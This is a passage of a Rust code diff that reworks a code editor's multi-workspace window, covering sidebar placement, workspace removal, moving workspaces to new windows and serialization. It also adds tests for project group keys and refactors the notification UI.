if self.workspaces.len() > 1 { - let prev_index = if self.active_workspace_index == 0 { - self.workspaces.len() - 1 - } else { - self.active_workspace_index - 1 - }; - self.activate_index(prev_index, window, cx); + fn sync_sidebar_to_workspace(&self, workspace: &Entity, cx: &mut Context) { + if self.sidebar_open() { + let sidebar_focus_handle = self.sidebar.as_ref().map(|s| s.focus_handle(cx)); + workspace.update(cx, |workspace, _| { + workspace.set_sidebar_focus_handle(sidebar_focus_handle); + }); } } - fn serialize(&mut self, cx: &mut App) { - let window_id = self.window_id; - let state = crate::persistence::model::MultiWorkspaceState { - active_workspace_id: self.workspace().read(cx).database_id(), - sidebar_open: self.sidebar_open, - }; - self._serialize_task = Some(cx.background_spawn(async move { - crate::persistence::write_multi_workspace_state(window_id, state).await; + pub(crate) fn serialize(&mut self, cx: &mut Context) { + self._serialize_task = Some(cx.spawn(async move |this, cx| { + let Some((window_id, state)) = this + .read_with(cx, |this, cx| { + let state = MultiWorkspaceState { + active_workspace_id: this.workspace().read(cx).database_id(), + project_group_keys: this + .project_group_keys() + .cloned() + .map(Into::into) + .collect::>(), + sidebar_open: this.sidebar_open, + sidebar_state: this.sidebar.as_ref().and_then(|s| s.serialized_state(cx)), + }; + (this.window_id, state) + }) + .ok() + else { + return; + }; + let kvp = cx.update(|cx| db::kvp::KeyValueStore::global(cx)); + crate::persistence::write_multi_workspace_state(&kvp, window_id, state).await; })); } @@ -396,9 +933,6 @@ impl MultiWorkspace { if let Some(task) = self._serialize_task.take() { tasks.push(task); } - if let Some(task) = self._create_task.take() { - tasks.push(task); - } tasks.extend(std::mem::take(&mut self.pending_removal_tasks)); async move { @@ -406,7 +940,7 @@ impl MultiWorkspace { } } - fn focus_active_workspace(&self, window: &mut Window, cx: &mut App) { + pub fn focus_active_workspace(&self, window: &mut Window, cx: &mut App) { // If a dock panel is zoomed, focus it instead of the center pane. // Otherwise, focusing the center pane triggers dismiss_zoomed_items_to_reveal // which closes the zoomed dock. @@ -501,15 +1035,10 @@ impl MultiWorkspace { } pub fn take_pending_removal_tasks(&mut self) -> Vec> { - let mut tasks: Vec> = std::mem::take(&mut self.pending_removal_tasks) + let tasks: Vec> = std::mem::take(&mut self.pending_removal_tasks) .into_iter() .filter(|task| !task.is_ready()) .collect(); - if let Some(task) = self._create_task.take() { - if !task.is_ready() { - tasks.push(task); - } - } tasks } @@ -534,14 +1063,16 @@ impl MultiWorkspace { cx: &mut Context, ) -> Entity { let workspace = cx.new(|cx| Workspace::test_new(project, window, cx)); - self.activate(workspace.clone(), cx); + self.activate(workspace.clone(), window, cx); workspace } - pub fn create_workspace(&mut self, window: &mut Window, cx: &mut Context) { - if !self.multi_workspace_enabled(cx) { - return; - } + #[cfg(any(test, feature = "test-support"))] + pub fn create_test_workspace( + &mut self, + window: &mut Window, + cx: &mut Context, + ) -> Task<()> { let app_state = self.workspace().read(cx).app_state().clone(); let project = Project::local( app_state.client.clone(), @@ -554,101 +1085,224 @@ impl MultiWorkspace { cx, ); let new_workspace = cx.new(|cx| Workspace::new(None, project, app_state, window, cx)); - self.set_active_workspace(new_workspace.clone(), cx); - self.focus_active_workspace(window, cx); + self.activate(new_workspace.clone(), window, cx); let weak_workspace = new_workspace.downgrade(); - self._create_task = Some(cx.spawn_in(window, async move |this, cx| { - let result = crate::persistence::DB.next_id().await; - this.update_in(cx, |this, window, cx| match result { - Ok(workspace_id) => { - if let Some(workspace) = weak_workspace.upgrade() { - let session_id = workspace.read(cx).session_id(); - let window_id = window.window_handle().window_id().as_u64(); - workspace.update(cx, |workspace, _cx| { - workspace.set_database_id(workspace_id); - }); - cx.background_spawn(async move { - crate::persistence::DB - .set_session_binding(workspace_id, session_id, Some(window_id)) - .await - .log_err(); - }) - .detach(); - } else { - cx.background_spawn(async move { - crate::persistence::DB - .delete_workspace_by_id(workspace_id) - .await - .log_err(); - }) - .detach(); - } - this.serialize(cx); - } - Err(error) => { - log::error!("Failed to create workspace: {error:#}"); - if let Some(index) = weak_workspace - .upgrade() - .and_then(|w| this.workspaces.iter().position(|ws| *ws == w)) - { - this.remove_workspace(index, window, cx); - } - this.workspace().update(cx, |workspace, cx| { - let id = NotificationId::unique::(); - workspace.show_toast( - Toast::new(id, format!("Failed to create workspace: {error}")), - cx, - ); + let db = crate::persistence::WorkspaceDb::global(cx); + cx.spawn_in(window, async move |this, cx| { + let workspace_id = db.next_id().await.unwrap(); + let workspace = weak_workspace.upgrade().unwrap(); + let task: Task<()> = this + .update_in(cx, |this, window, cx| { + let session_id = workspace.read(cx).session_id(); + let window_id = window.window_handle().window_id().as_u64(); + workspace.update(cx, |workspace, _cx| { + workspace.set_database_id(workspace_id); }); - } - }) - .log_err(); - })); + this.serialize(cx); + let db = db.clone(); + cx.background_spawn(async move { + db.set_session_binding(workspace_id, session_id, Some(window_id)) + .await + .log_err(); + }) + }) + .unwrap(); + task.await + }) } - pub fn remove_workspace(&mut self, index: usize, window: &mut Window, cx: &mut Context) { - if self.workspaces.len() <= 1 || index >= self.workspaces.len() { - return; - } + pub fn remove( + &mut self, + workspace: &Entity, + window: &mut Window, + cx: &mut Context, + ) -> bool { + let Some(index) = self.workspaces.iter().position(|w| w == workspace) else { + return false; + }; - let removed_workspace = self.workspaces.remove(index); + let old_key = workspace.read(cx).project_group_key(cx); + + if self.workspaces.len() <= 1 { + let has_worktrees = workspace.read(cx).visible_worktrees(cx).next().is_some(); + + if !has_worktrees { + return false; + } - if self.active_workspace_index >= self.workspaces.len() { - self.active_workspace_index = self.workspaces.len() - 1; - } else if self.active_workspace_index > index { - self.active_workspace_index -= 1; + let old_workspace = workspace.clone(); + let old_entity_id = old_workspace.entity_id(); + + let app_state = old_workspace.read(cx).app_state().clone(); + + let project = Project::local( + app_state.client.clone(), + app_state.node_runtime.clone(), + app_state.user_store.clone(), + app_state.languages.clone(), + app_state.fs.clone(), + None, + project::LocalProjectFlags::default(), + cx, + ); + + let new_workspace = cx.new(|cx| Workspace::new(None, project, app_state, window, cx)); + + self.workspaces[0] = new_workspace.clone(); + self.active_workspace = ActiveWorkspace::Persistent(0); + + Self::subscribe_to_workspace(&new_workspace, window, cx); + + self.sync_sidebar_to_workspace(&new_workspace, cx); + + let weak_self = cx.weak_entity(); + + new_workspace.update(cx, |workspace, cx| { + workspace.set_multi_workspace(weak_self, cx); + }); + + self.detach_workspace(&old_workspace, cx); + + cx.emit(MultiWorkspaceEvent::WorkspaceRemoved(old_entity_id)); + cx.emit(MultiWorkspaceEvent::WorkspaceAdded(new_workspace)); + cx.emit(MultiWorkspaceEvent::ActiveWorkspaceChanged); + } else { + let removed_workspace = self.workspaces.remove(index); + + if let Some(active_index) = self.active_workspace.persistent_index() { + if active_index >= self.workspaces.len() { + self.active_workspace = ActiveWorkspace::Persistent(self.workspaces.len() - 1); + } else if active_index > index { + self.active_workspace = ActiveWorkspace::Persistent(active_index - 1); + } + } + + self.detach_workspace(&removed_workspace, cx); + + cx.emit(MultiWorkspaceEvent::WorkspaceRemoved( + removed_workspace.entity_id(), + )); + cx.emit(MultiWorkspaceEvent::ActiveWorkspaceChanged); } - if let Some(workspace_id) = removed_workspace.read(cx).database_id() { - self.pending_removal_tasks.retain(|task| !task.is_ready()); - self.pending_removal_tasks - .push(cx.background_spawn(async move { - crate::persistence::DB - .delete_workspace_by_id(workspace_id) - .await - .log_err(); - })); + let key_still_in_use = self + .workspaces + .iter() + .any(|ws| ws.read(cx).project_group_key(cx) == old_key); + + if !key_still_in_use { + self.project_group_keys.retain(|k| k != &old_key); } self.serialize(cx); self.focus_active_workspace(window, cx); cx.notify(); + + true } - pub fn open_project( + pub fn move_workspace_to_new_window( &mut self, - paths: Vec, + workspace: &Entity, + window: &mut Window, + cx: &mut Context, + ) { + let workspace = workspace.clone(); + if !self.remove(&workspace, window, cx) { + return; + } + + let app_state: Arc = workspace.read(cx).app_state().clone(); + + cx.defer(move |cx| { + let options = (app_state.build_window_options)(None, cx); + + let Ok(window) = cx.open_window(options, |window, cx| { + cx.new(|cx| MultiWorkspace::new(workspace, window, cx)) + }) else { + return; + }; + + let _ = window.update(cx, |_, window, _| { + window.activate_window(); + }); + }); + } + + pub fn move_project_group_to_new_window( + &mut self, + key: &ProjectGroupKey, window: &mut Window, cx: &mut Context, - ) -> Task> { + ) { + let workspaces: Vec<_> = self + .workspaces_for_project_group(key, cx) + .cloned() + .collect(); + if workspaces.is_empty() { + return; + } + + self.project_group_keys.retain(|k| k != key); + + let mut removed = Vec::new(); + for workspace in &workspaces { + if self.remove(workspace, window, cx) { + removed.push(workspace.clone()); + } + } + + if removed.is_empty() { + return; + } + + let app_state = removed[0].read(cx).app_state().clone(); + + cx.defer(move |cx| { + let options = (app_state.build_window_options)(None, cx); + + let first = removed[0].clone(); + let rest = removed[1..].to_vec(); + + let Ok(new_window) = cx.open_window(options, |window, cx| { + cx.new(|cx| MultiWorkspace::new(first, window, cx)) + }) else { + return; + }; + + new_window + .update(cx, |mw, window, cx| { + for workspace in rest { + mw.activate(workspace, window, cx); + } + window.activate_window(); + }) + .log_err(); + }); + } + + fn move_active_workspace_to_new_window( + &mut self, + _: &MoveWorkspaceToNewWindow, + window: &mut Window, + cx: &mut Context, + ) { let workspace = self.workspace().clone(); + self.move_workspace_to_new_window(&workspace, window, cx); + } + pub fn open_project( + &mut self, + paths: Vec, + open_mode: OpenMode, + window: &mut Window, + cx: &mut Context, + ) -> Task>> { if self.multi_workspace_enabled(cx) { - workspace.update(cx, |workspace, cx| { - workspace.open_workspace_for_paths(true, paths, window, cx) - }) + self.find_or_create_local_workspace(PathList::new(&paths), window, cx) } else { + let workspace = self.workspace().clone(); cx.spawn_in(window, async move |_this, cx| { let should_continue = workspace .update_in(cx, |workspace, window, cx| { @@ -658,11 +1312,11 @@ impl MultiWorkspace { if should_continue { workspace .update_in(cx, |workspace, window, cx| { - workspace.open_workspace_for_paths(true, paths, window, cx) + workspace.open_workspace_for_paths(open_mode, paths, window, cx) })? .await } else { - Ok(()) + Ok(workspace) } }) } @@ -672,9 +1326,10 @@ impl MultiWorkspace { impl Render for MultiWorkspace { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { let multi_workspace_enabled = self.multi_workspace_enabled(cx); - let is_zoomed = self.workspace().read(cx).zoomed_item().is_some(); + let sidebar_side = self.sidebar_side(cx); + let sidebar_on_right = sidebar_side == SidebarSide::Right; - let sidebar: Option = if multi_workspace_enabled && self.sidebar_open { + let sidebar: Option = if multi_workspace_enabled && self.sidebar_open() { self.sidebar.as_ref().map(|sidebar_handle| { let weak = cx.weak_entity(); @@ -683,7 +1338,12 @@ impl Render for MultiWorkspace { div() .id("sidebar-resize-handle") .absolute() - .right(-SIDEBAR_RESIZE_HANDLE_SIZE / 2.) + .when(!sidebar_on_right, |el| { + el.right(-SIDEBAR_RESIZE_HANDLE_SIZE / 2.) + }) + .when(sidebar_on_right, |el| { + el.left(-SIDEBAR_RESIZE_HANDLE_SIZE / 2.) + }) .top(px(0.)) .h_full() .w(SIDEBAR_RESIZE_HANDLE_SIZE) @@ -701,9 +1361,15 @@ impl Render for MultiWorkspace { if let Some(sidebar) = this.sidebar.as_mut() { sidebar.set_width(None, cx); } + this.serialize(cx); }) .ok(); cx.stop_propagation(); + } else { + weak.update(cx, |this, cx| { + this.serialize(cx); + }) + .ok(); } }) .occlude(), @@ -723,7 +1389,13 @@ impl Render for MultiWorkspace { None }; - let ui_font = theme::setup_ui_font(window, cx); + let (left_sidebar, right_sidebar) = if sidebar_on_right { + (None, sidebar) + } else { + (sidebar, None) + }; + + let ui_font = theme_settings::setup_ui_font(window, cx); let text_color = cx.theme().colors().text; let workspace = self.workspace().clone(); @@ -737,152 +1409,82 @@ impl Render for MultiWorkspace { .font(ui_font) .text_color(text_color) .on_action(cx.listener(Self::close_window)) - .on_action( - cx.listener(|this: &mut Self, _: &NewWorkspaceInWindow, window, cx| { - this.create_workspace(window, cx); - }), - ) - .on_action( - cx.listener(|this: &mut Self, _: &NextWorkspaceInWindow, window, cx| { - this.activate_next_workspace(window, cx); - }), - ) - .on_action(cx.listener( - |this: &mut Self, _: &PreviousWorkspaceInWindow, window, cx| { - this.activate_previous_workspace(window, cx); - }, - )) .when(self.multi_workspace_enabled(cx), |this| { this.on_action(cx.listener( |this: &mut Self, _: &ToggleWorkspaceSidebar, window, cx| { this.toggle_sidebar(window, cx); }, )) + .on_action(cx.listener( + |this: &mut Self, _: &CloseWorkspaceSidebar, window, cx| { + this.close_sidebar_action(window, cx); + }, + )) .on_action(cx.listener( |this: &mut Self, _: &FocusWorkspaceSidebar, window, cx| { this.focus_sidebar(window, cx); }, )) + .on_action(cx.listener(Self::move_active_workspace_to_new_window)) + .on_action(cx.listener( + |this: &mut Self, action: &ToggleThreadSwitcher, window, cx| { + if let Some(sidebar) = &this.sidebar { + sidebar.toggle_thread_switcher(action.select_last, window, cx); + } + }, + )) }) .when( self.sidebar_open() && self.multi_workspace_enabled(cx), |this| { this.on_drag_move(cx.listener( - |this: &mut Self, e: &DragMoveEvent, _window, cx| { + move |this: &mut Self, + e: &DragMoveEvent, + window, + cx| { if let Some(sidebar) = &this.sidebar { - let new_width = e.event.position.x; + let new_width = if sidebar_on_right { + window.bounds().size.width - e.event.position.x + } else { + e.event.position.x + }; sidebar.set_width(Some(new_width), cx); } }, )) - .children(sidebar) }, ) + .children(left_sidebar) .child( div() .flex() .flex_1() .size_full() .overflow_hidden() - .when(is_zoomed, |this| this.absolute().inset_0()) .child(self.workspace().clone()), ) - .child(self.workspace().read(cx).modal_layer.clone()), + .children(right_sidebar) + .child(self.workspace().read(cx).modal_layer.clone()) + .children(self.sidebar_overlay.as_ref().map(|view| { + deferred(div().absolute().size_full().inset_0().occlude().child( + v_flex().h(px(0.0)).top_20().items_center().child( + h_flex().occlude().child(view.clone()).on_mouse_down( + MouseButton::Left, + |_, _, cx| { + cx.stop_propagation(); + }, + ), + ), + )) + .with_priority(2) + })), window, cx, Tiling { - left: multi_workspace_enabled && self.sidebar_open && !is_zoomed, + left: !sidebar_on_right && multi_workspace_enabled && self.sidebar_open(), + right: sidebar_on_right && multi_workspace_enabled && self.sidebar_open(), ..Tiling::default() }, ) } } - -#[cfg(test)] -mod tests { - use super::*; - use fs::FakeFs; - use gpui::TestAppContext; - use settings::SettingsStore; - - fn init_test(cx: &mut TestAppContext) { - cx.update(|cx| { - let settings_store = SettingsStore::test(cx); - cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); - DisableAiSettings::register(cx); - cx.update_flags(false, vec!["agent-v2".into()]); - }); - } - - #[gpui::test] - async fn test_sidebar_disabled_when_disable_ai_is_enabled(cx: &mut TestAppContext) { - init_test(cx); - let fs = FakeFs::new(cx.executor()); - let project = Project::test(fs, [], cx).await; - - let (multi_workspace, cx) = - cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); - - multi_workspace.read_with(cx, |mw, cx| { - assert!(mw.multi_workspace_enabled(cx)); - }); - - multi_workspace.update_in(cx, |mw, _window, cx| { - mw.open_sidebar(cx); - assert!(mw.is_sidebar_open()); - }); - - cx.update(|_window, cx| { - DisableAiSettings::override_global(DisableAiSettings { disable_ai: true }, cx); - }); - cx.run_until_parked(); - - multi_workspace.read_with(cx, |mw, cx| { - assert!( - !mw.is_sidebar_open(), - "Sidebar should be closed when disable_ai is true" - ); - assert!( - !mw.multi_workspace_enabled(cx), - "Multi-workspace should be disabled when disable_ai is true" - ); - }); - - multi_workspace.update_in(cx, |mw, window, cx| { - mw.toggle_sidebar(window, cx); - }); - multi_workspace.read_with(cx, |mw, _cx| { - assert!( - !mw.is_sidebar_open(), - "Sidebar should remain closed when toggled with disable_ai true" - ); - }); - - cx.update(|_window, cx| { - DisableAiSettings::override_global(DisableAiSettings { disable_ai: false }, cx); - }); - cx.run_until_parked(); - - multi_workspace.read_with(cx, |mw, cx| { - assert!( - mw.multi_workspace_enabled(cx), - "Multi-workspace should be enabled after re-enabling AI" - ); - assert!( - !mw.is_sidebar_open(), - "Sidebar should still be closed after re-enabling AI (not auto-opened)" - ); - }); - - multi_workspace.update_in(cx, |mw, window, cx| { - mw.toggle_sidebar(window, cx); - }); - multi_workspace.read_with(cx, |mw, _cx| { - assert!( - mw.is_sidebar_open(), - "Sidebar should open when toggled after re-enabling AI" - ); - }); - } -} diff --git a/crates/workspace/src/multi_workspace_tests.rs b/crates/workspace/src/multi_workspace_tests.rs new file mode 100644 index 0000000000000000000000000000000000000000..ab6ca43d5aff482b637add9083b1ad9d388d7993 --- /dev/null +++ b/crates/workspace/src/multi_workspace_tests.rs @@ -0,0 +1,343 @@ +use super::*; +use feature_flags::FeatureFlagAppExt; +use fs::FakeFs; +use gpui::TestAppContext; +use project::{DisableAiSettings, ProjectGroupKey}; +use serde_json::json; +use settings::SettingsStore; + +fn init_test(cx: &mut TestAppContext) { + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + theme_settings::init(theme::LoadThemes::JustBase, cx); + DisableAiSettings::register(cx); + cx.update_flags(false, vec!["agent-v2".into()]); + }); +} + +#[gpui::test] +async fn test_sidebar_disabled_when_disable_ai_is_enabled(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + + multi_workspace.read_with(cx, |mw, cx| { + assert!(mw.multi_workspace_enabled(cx)); + }); + + multi_workspace.update_in(cx, |mw, _window, cx| { + mw.open_sidebar(cx); + assert!(mw.sidebar_open()); + }); + + cx.update(|_window, cx| { + DisableAiSettings::override_global(DisableAiSettings { disable_ai: true }, cx); + }); + cx.run_until_parked(); + + multi_workspace.read_with(cx, |mw, cx| { + assert!( + !mw.sidebar_open(), + "Sidebar should be closed when disable_ai is true" + ); + assert!( + !mw.multi_workspace_enabled(cx), + "Multi-workspace should be disabled when disable_ai is true" + ); + }); + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.toggle_sidebar(window, cx); + }); + multi_workspace.read_with(cx, |mw, _cx| { + assert!( + !mw.sidebar_open(), + "Sidebar should remain closed when toggled with disable_ai true" + ); + }); + + cx.update(|_window, cx| { + DisableAiSettings::override_global(DisableAiSettings { disable_ai: false }, cx); + }); + cx.run_until_parked(); + + multi_workspace.read_with(cx, |mw, cx| { + assert!( + mw.multi_workspace_enabled(cx), + "Multi-workspace should be enabled after re-enabling AI" + ); + assert!( + !mw.sidebar_open(), + "Sidebar should still be closed after re-enabling AI (not auto-opened)" + ); + }); + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.toggle_sidebar(window, cx); + }); + multi_workspace.read_with(cx, |mw, _cx| { + assert!( + mw.sidebar_open(), + "Sidebar should open when toggled after re-enabling AI" + ); + }); +} + +#[gpui::test] +async fn test_project_group_keys_initial(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root_a", json!({ "file.txt": "" })).await; + let project = Project::test(fs, ["/root_a".as_ref()], cx).await; + + let expected_key = project.read_with(cx, |project, cx| project.project_group_key(cx)); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + multi_workspace.read_with(cx, |mw, _cx| { + let keys: Vec<&ProjectGroupKey> = mw.project_group_keys().collect(); + assert_eq!(keys.len(), 1, "should have exactly one key on creation"); + assert_eq!(*keys[0], expected_key); + }); +} + +#[gpui::test] +async fn test_project_group_keys_add_workspace(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root_a", json!({ "file.txt": "" })).await; + fs.insert_tree("/root_b", json!({ "file.txt": "" })).await; + let project_a = Project::test(fs.clone(), ["/root_a".as_ref()], cx).await; + let project_b = Project::test(fs.clone(), ["/root_b".as_ref()], cx).await; + + let key_a = project_a.read_with(cx, |p, cx| p.project_group_key(cx)); + let key_b = project_b.read_with(cx, |p, cx| p.project_group_key(cx)); + assert_ne!( + key_a, key_b, + "different roots should produce different keys" + ); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + multi_workspace.read_with(cx, |mw, _cx| { + assert_eq!(mw.project_group_keys().count(), 1); + }); + + // Adding a workspace with a different project root adds a new key. + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b, window, cx); + }); + + multi_workspace.read_with(cx, |mw, _cx| { + let keys: Vec<&ProjectGroupKey> = mw.project_group_keys().collect(); + assert_eq!( + keys.len(), + 2, + "should have two keys after adding a second workspace" + ); + assert_eq!(*keys[0], key_a); + assert_eq!(*keys[1], key_b); + }); +} + +#[gpui::test] +async fn test_project_group_keys_duplicate_not_added(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root_a", json!({ "file.txt": "" })).await; + let project_a = Project::test(fs.clone(), ["/root_a".as_ref()], cx).await; + // A second project entity pointing at the same path produces the same key. + let project_a2 = Project::test(fs.clone(), ["/root_a".as_ref()], cx).await; + + let key_a = project_a.read_with(cx, |p, cx| p.project_group_key(cx)); + let key_a2 = project_a2.read_with(cx, |p, cx| p.project_group_key(cx)); + assert_eq!(key_a, key_a2, "same root path should produce the same key"); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_a2, window, cx); + }); + + multi_workspace.read_with(cx, |mw, _cx| { + let keys: Vec<&ProjectGroupKey> = mw.project_group_keys().collect(); + assert_eq!( + keys.len(), + 1, + "duplicate key should not be added when a workspace with the same root is inserted" + ); + }); +} + +#[gpui::test] +async fn test_project_group_keys_on_worktree_added(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root_a", json!({ "file.txt": "" })).await; + fs.insert_tree("/root_b", json!({ "file.txt": "" })).await; + let project = Project::test(fs, ["/root_a".as_ref()], cx).await; + + let initial_key = project.read_with(cx, |p, cx| p.project_group_key(cx)); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + // Add a second worktree to the same project. + let (worktree, _) = project + .update(cx, |project, cx| { + project.find_or_create_worktree("/root_b", true, cx) + }) + .await + .unwrap(); + worktree + .read_with(cx, |tree, _| tree.as_local().unwrap().scan_complete()) + .await; + cx.run_until_parked(); + + let updated_key = project.read_with(cx, |p, cx| p.project_group_key(cx)); + assert_ne!( + initial_key, updated_key, + "key should change after adding a worktree" + ); + + multi_workspace.read_with(cx, |mw, _cx| { + let keys: Vec<&ProjectGroupKey> = mw.project_group_keys().collect(); + assert_eq!( + keys.len(), + 2, + "should have both the original and updated key" + ); + assert_eq!(*keys[0], initial_key); + assert_eq!(*keys[1], updated_key); + }); +} + +#[gpui::test] +async fn test_project_group_keys_on_worktree_removed(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root_a", json!({ "file.txt": "" })).await; + fs.insert_tree("/root_b", json!({ "file.txt": "" })).await; + let project = Project::test(fs, ["/root_a".as_ref(), "/root_b".as_ref()], cx).await; + + let initial_key = project.read_with(cx, |p, cx| p.project_group_key(cx)); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + // Remove one worktree. + let worktree_b_id = project.read_with(cx, |project, cx| { + project + .worktrees(cx) + .find(|wt| wt.read(cx).root_name().as_unix_str() == "root_b") + .unwrap() + .read(cx) + .id() + }); + project.update(cx, |project, cx| { + project.remove_worktree(worktree_b_id, cx); + }); + cx.run_until_parked(); + + let updated_key = project.read_with(cx, |p, cx| p.project_group_key(cx)); + assert_ne!( + initial_key, updated_key, + "key should change after removing a worktree" + ); + + multi_workspace.read_with(cx, |mw, _cx| { + let keys: Vec<&ProjectGroupKey> = mw.project_group_keys().collect(); + assert_eq!( + keys.len(), + 2, + "should accumulate both the original and post-removal key" + ); + assert_eq!(*keys[0], initial_key); + assert_eq!(*keys[1], updated_key); + }); +} + +#[gpui::test] +async fn test_project_group_keys_across_multiple_workspaces_and_worktree_changes( + cx: &mut TestAppContext, +) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root_a", json!({ "file.txt": "" })).await; + fs.insert_tree("/root_b", json!({ "file.txt": "" })).await; + fs.insert_tree("/root_c", json!({ "file.txt": "" })).await; + let project_a = Project::test(fs.clone(), ["/root_a".as_ref()], cx).await; + let project_b = Project::test(fs.clone(), ["/root_b".as_ref()], cx).await; + + let key_a = project_a.read_with(cx, |p, cx| p.project_group_key(cx)); + let key_b = project_b.read_with(cx, |p, cx| p.project_group_key(cx)); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b, window, cx); + }); + + multi_workspace.read_with(cx, |mw, _cx| { + assert_eq!(mw.project_group_keys().count(), 2); + }); + + // Now add a worktree to project_a. This should produce a third key. + let (worktree, _) = project_a + .update(cx, |project, cx| { + project.find_or_create_worktree("/root_c", true, cx) + }) + .await + .unwrap(); + worktree + .read_with(cx, |tree, _| tree.as_local().unwrap().scan_complete()) + .await; + cx.run_until_parked(); + + let key_a_updated = project_a.read_with(cx, |p, cx| p.project_group_key(cx)); + assert_ne!(key_a, key_a_updated); + + multi_workspace.read_with(cx, |mw, _cx| { + let keys: Vec<&ProjectGroupKey> = mw.project_group_keys().collect(); + assert_eq!( + keys.len(), + 3, + "should have key_a, key_b, and the updated key_a with root_c" + ); + assert_eq!(*keys[0], key_a); + assert_eq!(*keys[1], key_b); + assert_eq!(*keys[2], key_a_updated); + }); +} diff --git a/crates/workspace/src/notifications.rs b/crates/workspace/src/notifications.rs index 84f479b77e4f0274e0775353d3a7cd5579768f1c..ce54765e3ff81fde015d465d18b03cea44bbbe8f 100644 --- a/crates/workspace/src/notifications.rs +++ b/crates/workspace/src/notifications.rs @@ -5,11 +5,11 @@ use gpui::{ DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, PromptLevel, Render, ScrollHandle, Task, TextStyleRefinement, UnderlineStyle, WeakEntity, svg, }; -use markdown::{Markdown, MarkdownElement, MarkdownStyle}; +use markdown::{CopyButtonVisibility, Markdown, MarkdownElement, MarkdownStyle}; use parking_lot::Mutex; use project::project_settings::ProjectSettings; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use std::ops::Deref; use std::sync::{Arc, LazyLock}; @@ -234,6 +234,14 @@ impl Workspace { self.suppressed_notifications.insert(id.clone()); } + pub fn is_notification_suppressed(&self, notification_id: NotificationId) -> bool { + self.suppressed_notifications.contains(¬ification_id) + } + + pub fn unsuppress(&mut self, notification_id: NotificationId) { + self.suppressed_notifications.remove(¬ification_id); + } + pub fn show_initial_notifications(&mut self, cx: &mut Context) { // Allow absence of the global so that tests don't need to initialize it. let app_notifications = GLOBAL_APP_NOTIFICATIONS @@ -393,8 +401,7 @@ impl Render for LanguageServerPrompt { MarkdownElement::new(self.markdown.clone(), markdown_style(window, cx)) .text_size(TextSize::Small.rems(cx)) .code_block_renderer(markdown::CodeBlockRenderer::Default { - copy_button: false, - copy_button_on_hover: false, + copy_button_visibility: CopyButtonVisibility::Hidden, border: false, }) .on_url_click(|link, _, cx| cx.open_url(&link)), @@ -657,15 +664,17 @@ impl RenderOnce for NotificationFrame { IconButton::new(close_id, close_icon) .tooltip(move |_window, cx| { if suppress { - Tooltip::for_action( - "Suppress.\nClose with click.", - &SuppressNotification, + Tooltip::with_meta( + "Suppress", + Some(&SuppressNotification), + "Click to Close", cx, ) } else if show_suppress_button { - Tooltip::for_action( - "Close.\nSuppress with shift-click.", - &menu::Cancel, + Tooltip::with_meta( + "Close", + Some(&menu::Cancel), + "Shift-click to Suppress", cx, ) } else { @@ -915,11 +924,11 @@ pub mod simple_message_notification { })); if let Some(icon) = self.primary_icon { - button = button - .icon(icon) - .icon_color(self.primary_icon_color.unwrap_or(Color::Muted)) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small); + button = button.start_icon( + Icon::new(icon) + .size(IconSize::Small) + .color(self.primary_icon_color.unwrap_or(Color::Muted)), + ); } button @@ -935,11 +944,11 @@ pub mod simple_message_notification { })); if let Some(icon) = self.secondary_icon { - button = button - .icon(icon) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) - .icon_color(self.secondary_icon_color.unwrap_or(Color::Muted)); + button = button.start_icon( + Icon::new(icon) + .size(IconSize::Small) + .color(self.secondary_icon_color.unwrap_or(Color::Muted)), + ); } button @@ -953,9 +962,11 @@ pub mod simple_message_notification { let url = url.clone(); Button::new(message.clone(), message.clone()) .label_size(LabelSize::Small) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Indicator) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Indicator) + .color(Color::Muted), + ) .on_click(cx.listener(move |_, _, _, cx| { cx.open_url(&url); })) @@ -1215,10 +1226,8 @@ where let mut display = format!("{err:#}"); if !display.ends_with('\n') { 